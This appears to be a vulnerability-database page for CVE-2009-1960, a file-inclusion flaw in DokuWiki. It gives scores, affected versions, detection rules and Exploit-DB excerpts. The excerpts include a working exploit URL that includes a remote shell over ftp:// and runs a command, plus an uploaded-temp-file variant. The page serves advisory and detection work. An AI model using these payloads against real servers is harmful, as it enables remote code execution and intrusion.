CVE-2009-1960
published 2009-06-08CVE-2009-1960: inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when register_globals is enabled, allows remote attackers to include and execute arbitrary…
PriorityP260critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
23.16%
97.5th percentile
inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via the config_cascade[main][default][] parameter to doku.php. NOTE: PHP remote file inclusion is also possible in PHP 5 using ftp:// URLs.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | dokuwiki | < dokuwiki 0.0.20090214b-1 (bookworm) | dokuwiki 0.0.20090214b-1 (bookworm) |
| dokuwiki | dokuwiki | — | — |
| dokuwiki | dokuwiki | — | — |
| dokuwiki | dokuwiki | — | — |
| dokuwiki | dokuwiki | >= 0 < 0.0.20090214b-1 | 0.0.20090214b-1 |
| dokuwiki | dokuwiki | >= 0 < 0.0.20090214b-1 | 0.0.20090214b-1 |
| dokuwiki | dokuwiki | >= 0 < 0.0.20090214b-1 | 0.0.20090214b-1 |
| dokuwiki | dokuwiki | >= 0 < 0.0.20090214b-1 | 0.0.20090214b-1 |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://[host]/dokuwiki-2009-02-14/doku.php?config_cascade[main][default][]=ftp://anonymous:[email protected]/folder/sh.php&cmd=ls%20-la>out.txt↗
- →Detect HTTP requests to doku.php containing the parameter 'config_cascade[main][default][]' in the query string, which is the direct exploitation vector for this LFI/RFI vulnerability. ↗
- →Alert on requests to doku.php where 'config_cascade[main][default][]' is set to path traversal strings (e.g., /etc/passwd, ./data/pages/*.txt, ./data/media/*.doc) indicating local file inclusion attempts. ↗
- →Alert on requests to doku.php where 'config_cascade[main][default][]' is set to an ftp:// URL, indicating PHP 5 remote file inclusion via FTP wrapper. ↗
- →Detect POST requests to doku.php that combine a multipart file upload body with a 'config_cascade[main][default][]' query parameter pointing to a PHP temporary file path, indicating the combined upload+include RCE technique. ↗
- ·The vulnerability is only exploitable when PHP's register_globals directive is enabled (non-default in modern PHP). Installations with register_globals = Off are not affected. ↗
- ·The FTP-wrapper remote file inclusion variant additionally requires allow_url_fopen = On (PHP default) AND allow_url_include = On (NOT the PHP default), limiting its exploitability. ↗
- ·The temporary file inclusion trick requires file_uploads = On (PHP default), meaning it is broadly applicable on default PHP configurations as long as register_globals is also on. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
osv9.3CRITICAL
vendor_debian9.3LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-hm24-p578-9g92: inc/init
ghsa_unreviewed·2022-05-02
CVE-2009-1960 [HIGH] CWE-94 GHSA-hm24-p578-9g92: inc/init
inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via the config_cascade[main][default][] parameter to doku.php. NOTE: PHP remote file inclusion is also possible in PHP 5 using ftp:// URLs.
OSV
CVE-2009-1960: inc/init
osv·2009-06-08·CVSS 9.3
CVE-2009-1960 [CRITICAL] CVE-2009-1960: inc/init
inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via the config_cascade[main][default][] parameter to doku.php. NOTE: PHP remote file inclusion is also possible in PHP 5 using ftp:// URLs.
Debian
CVE-2009-1960: dokuwiki - inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when regist...
vendor_debian·2009·CVSS 9.3
CVE-2009-1960 [CRITICAL] CVE-2009-1960: dokuwiki - inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when regist...
inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via the config_cascade[main][default][] parameter to doku.php. NOTE: PHP remote file inclusion is also possible in PHP 5 using ftp:// URLs.
Scope: local
bookworm: resolved (fixed in 0.0.20090214b-1)
bullseye: resolved (fixed in 0.0.20090214b-1)
forky: resolved (fixed in 0.0.20090214b-1)
sid: resolved (fixed in 0.0.20090214b-1)
trixie: resolved (fixed in 0.0.20090214b-1)
No detection rules found.
Exploit-DB
Dokuwiki 2009-02-14 - Local File Inclusion
exploitdb·2009-05-26
CVE-2009-1960 Dokuwiki 2009-02-14 - Local File Inclusion
Dokuwiki 2009-02-14 - Local File Inclusion
---
# Author_ girex
# Homepage_ girex.altervista.org
# CMS_ Dokuwiki
# Homepage_ dokuwiki.org
# Affected versions_ 2009-02-14
rc2009-02-06
rc2009-01-30
# Bug_ Local file inclusion
# Need_ register_globals = On
# Vuln description_
# File: /inc/init.php
// if available load a preload config file
$preload = fullpath(dirname(__FILE__)).'/preload.php';
if (@file_exists($preload)) include($preload);
...
//set the configuration cascade - but only if its not already been set in preload.php
global $config_cascade;
if (empty($config_cascade)) {
$config_cascade = array(
'main' => array(
'default' => array(DOKU_CONF.'dokuwiki.php'),
'local' => array(DOKU_CONF.'local.php'),
'protected' => array(DOKU_CONF.'local.protected.php'),
),
...
// load the g
Exploit-DB
Dokuwiki 2009-02-14 - Temporary/Remote File Inclusion
exploitdb·2009-05-26
CVE-2009-1960 Dokuwiki 2009-02-14 - Temporary/Remote File Inclusion
Dokuwiki 2009-02-14 - Temporary/Remote File Inclusion
---
Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit
tested and working
I was reading: http://www.milw0rm.com/exploits/8781
by girex
[quote]
It's not a RFI couse use of file_exists function.
[/quote]
How wrong brother!
trick 1 (ftp:// wrapper with php 5):
needs register_globals = on
allow_url_fopen = On (default)
allow_url_include = On (not default)
http://[host]/dokuwiki-2009-02-14/doku.php?config_cascade[main][default][]=ftp://anonymous:[email protected]/folder/sh.php&cmd=ls%20-la>out.txt
trick 2:
needs register_globals = on
file_uploads = On (default)
include a temporary file passed by the $_FILES[] array:
where your shell is like:
because when there is no prefix or suffix for the affected var, it remains like
No writeups or analysis indexed.
http://bugs.splitbrain.org/index.php?do=details&task_id=1700http://dev.splitbrain.org/darcsweb/darcsweb.cgi?r=dokuwiki%3Ba=commitdiff%3Bh=20090526145030-7ad00-c0483e021f47898c8597f3bfbdd26c637f891d86.gzhttp://secunia.com/advisories/35218http://www.securityfocus.com/bid/35095https://www.exploit-db.com/exploits/8781https://www.exploit-db.com/exploits/8812http://bugs.splitbrain.org/index.php?do=details&task_id=1700http://dev.splitbrain.org/darcsweb/darcsweb.cgi?r=dokuwiki%3Ba=commitdiff%3Bh=20090526145030-7ad00-c0483e021f47898c8597f3bfbdd26c637f891d86.gzhttp://secunia.com/advisories/35218http://www.securityfocus.com/bid/35095https://www.exploit-db.com/exploits/8781https://www.exploit-db.com/exploits/8812
2009-06-08
Published